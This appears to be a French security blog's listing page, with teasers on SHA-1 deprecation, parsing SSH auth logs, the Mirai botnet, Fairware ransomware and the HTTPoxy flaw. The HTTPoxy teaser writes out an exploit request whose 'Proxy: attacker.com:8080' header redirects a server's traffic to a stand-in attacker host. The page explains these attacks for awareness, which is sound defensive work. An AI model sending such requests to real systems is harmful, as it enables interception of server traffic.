Technologies

No more user awareness

Un point sur lequel tout le monde est d’accord, dans le monde de la sécurité informatique, est que le principal maillon faible dans une entreprise est l’utilisateur. Une multitude de cas qui démontrent cette faiblesse sont publiés régulièrement. Comme par exemple, laisser trainer une clé USB proche d’une entreprise et attendre que quelqu’un la prenne et la connecte à un système. Ou, comment avec un simple appel téléphonique, un hacker arrive à prendre le contrôle d’un compte mobile (illustré ici). Mais surtout les emails contenant une pièce jointe infectée ou qui contient un lien vers un site malicieux. La principale et souvent la seule réponse de l’industrie à cette problématique est de former et sensibiliser les utilisateurs aux différents aspects de la sécurité. Ne pas se connecter sur un site suspicieux, ne pas ouvrir des emails avec pièces jointes de sources inconnues, changer de mot de passe régulièrement avec un minimum de complexité, etc etc. Cela passe aussi au travers de messages d’avertissement du danger affichés à l’utilisateur. Un exemple, des plus connus, est l’UAC introduit avec Windows Vista qui est encore dans le souvenir de tout le monde comme une plaie qui pop-up constamment. Ou encore le warning affiché quand un certificat d’un site Internet n’est pas valide. Dans l’esprit de l’utilisateur ce message est vu comme un perturbateur qui l’empêche...

Fin de support de SHA-1

La fin est proche pour SHA-1. En effet, Microsoft, Mozilla et Google ont annoncé, il y a maintenant quelques années, leur intention de stopper le support de SHA-1 dans les navigateurs web et l’algorithme est depuis déprécié. De plus, le « National Institute of Standards and Technology » (NIST) avait émis en 2013 une recommandation en précisant que SHA-1 ne devait pas être utilisé après le 31 décembre 2013. Afin de clarifier au mieux la situation pour 2017, voici quelques réponses aux questions régulièrement posées par nos clients : 1. Que va-t-il se passer au 1er Janvier 2017 ? Il ne va rien se passer de spécial pour les sites web https utilisant un certificat signé en SHA-1. 2. Quand est ce que les navigateurs Internet vont bloquer l’accès au sites web signés en SHA-1 ? La réponse dépend des éditeurs : Microsoft prévoit une mise à jour qui supprimera le support pour les navigateurs Internet Explorer et Edge au 1er février 2017 Mozilla va supprimer le support de SHA-1 avec Firefox 51 qui sera disponible en février prochain, Google va quant à lui retirer le support de SHA-1 fin Janvier avec la release de Chrome 56 3. Est-ce que les sites web internes seront concernés par ces updates ? Les différents navigateurs vont purement et simplement supprimer le support de SHA-1 et bloquer l’accès au site souhaité, qu’il soit interne ou publique. 4. Est-ce que tous les certificats...

Extraction des IP malicieuses depuis le fichier auth.log d’un serveur Linux

Dans cette article, nous présentons une commande shell qui a pour but d’extraire les adresses IP et les noms d’utilisateurs liés à des tentatives manquées de se connecter à un serveur Linux. Dans notre exemple, les logs sont collectés sur une machine Linux tournant sous Ubuntu Server 16.04 LTS. La commande a été développée et testée sur ce même système et elle peut donc varier d’un système à l’autre. Afin que le résultat de cette commande puisse être directement consommé par une API REST, nous allons la formater en JSON. Nous allons récupérer ces informations depuis les logs d’authentification qui se trouvent généralement dans /var/log/auth.log. Les logs se trouvent dans /var/log/secure sur CentOS. Dans notre cas, nous nous intéressons uniquement aux logs provenant du service sshd, vu qu’il s’agit d’un serveur publique accessible uniquement en SSH. Sans plus attendre, voici ladite commande: echo “[” > failed_auth.json && zcat -f –stdout auth.log* | grep “Invalid user” | awk ‘{print ” {\”user\”: \”” $8 “\”, \”ip\”: \”” $10 “\”\},”}’ | uniq | sed ‘$ s/,$//’ | tee -a failed_auth.json && echo “]” >> failed_auth.json Décortiquons-la un peu! La commande commence et se termine par un simple « echo ». Rien de...

L’avènement du déni de service super massif grâce à l’IoT

Il ne vous a surement pas échappé que plusieurs attaques par dénis de services ont été rondement menées ces dernières semaines. L’une d’elles a ciblé le journaliste Brian Krebs et plus particulièrement son blog qui a été violemment touché par un DDoS qui a dépassé les 600 Gbps ayant même forcé Akamai, fournisseur de solutions anti-DDoS et hébergeur du blog de Krebs, à fermer le site internet pendant un moment. Peu de temps après, c’est l’hébergeur OVH qui est ciblé avec une attaque dépassant cette fois le Terabit par seconde. Ces attaques ont plusieurs points communs : La violence et la puissance qui a déferlé sur les victimes, La compromission et l’utilisation de plusieurs centaines de milliers d’objets connectés et plus particulièrement de caméras IP mais aussi des routeurs, des NAS et même des Raspberry PI, L’utilisation du même code source : MIRAI Une nouvelle menace plane sur Internet Le code source de l’outil ayant servi à réaliser ces attaques est rendu publique depuis plusieurs jours. Il est disponible en libre accès à l’adresse GitHub suivante : Mirai-Source-Code Après seulement quelques jours, il y a déjà plus de 550 forks (copies du projet) dans la nature sans compter les personnes qui ont pu copier le code sur un support gardé offline. Supprimer le code source du repository GitHub n’a donc plus aucun intérêt, le mal est déjà fait et le code est modifiable et...

Fairware : Diversification dans les Rançogiciels (Ransomware)

Un modèle économique qui a fait ses preuves ! Point de révolution sur ce point. La volonté de rançonner les entreprises en prenant en otage ses données se confirme. Et une raison simple, c’est que les attaques « en masse » de ces derniers mois semblent s’être avérées fructueuses. Mais c’est la cible qui change ici. C’est clairement les entreprises, et plus précisément la présence Internet des entreprises qui est ciblée. Techniquement : décevant de simplicité Le créateur de ce nouveau Malware est semble-t-il plus fainéant (certains diront « pragmatique ») que ses confrères. En effet, la tendance jusqu’à ce jour était de crypter les données et de revendre la clé à la victime malheureuse du Malware (généralement sans lui la fournir d’ailleurs). Et bien Fairware est bien plus simple… il vole purement et simplement les données, et les détruit sur le serveur, en laissant simplement un fichier texte expliquant à la victime comment les récupérer. En fait ce fichier renvoi l’utilisateur sur un lien PasteBin qui présente les instructions détaillées : Il y aurait en plus un chiffrement des données lorsqu’elles sont en possession de l’attaquant, mais cela est difficilement vérifiable. Donc si ce malheur vous touche, vous pourrez (peut-être) récupérer vos fichiers pour la modique somme de 2 Bitcoins, soit un peu plus de 1100$ au cours actuel… payable dans les 2 semaines qui suivent. Ou...

HTTPoxy : Une vulnérabilité vieille de 15 ans refait surface!

Qu’est ce que HTTPoxy ? Il y a 15 ans, une vulnérabilité touchant le module libwww-perl était découverte et rapidement corrigée. Aujourd’hui, cette faille revient au gout du jour et semble impacter de nombreux produits. Cette vulnérabilité touche les applications Web CGI tels que celles développées en PHP, Python, Go ou Ruby. Protocole CGI – Meta variables Un serveur de type CGI prend toutes les entêtes HTTP personnalisées d’une requête, ajoute « HTTP_ » à son nom et l’enregistre en tant que variable d’environnement. Par exemple, la requête suivante envoyée à une application de type CGI : GET /index.html HTTP/1.0 Host: example.com Expert: Solutions Va engendrer la création de la variable d’environnement suivante : HTTP_Expert=”Solutions” Variable d’environnement HTTP_PROXY Sur un système Linux/Unix, une variable d’environnement spéciale permet à certains programmes usuels (ex : curl, wget, lynx, …) de connaitre et d’utiliser automatiquement le proxy de l’entreprise pour effectuer des requêtes vers Internet. Attaque et exploitation Un attaquant, via une requête similaire à celle-ci-dessous, peux écraser la valeur de la variable d’environnement HTTP_PROXY du serveur : GET /cgi-bin/script.pl HTTP/1.0 Host: victim.com Proxy: attacker.com:8080 Ceci aura comme effet de rediriger le trafic Internet du serveur Web vers une machine tiers contrôlée par l’attaquant. Par exemple,...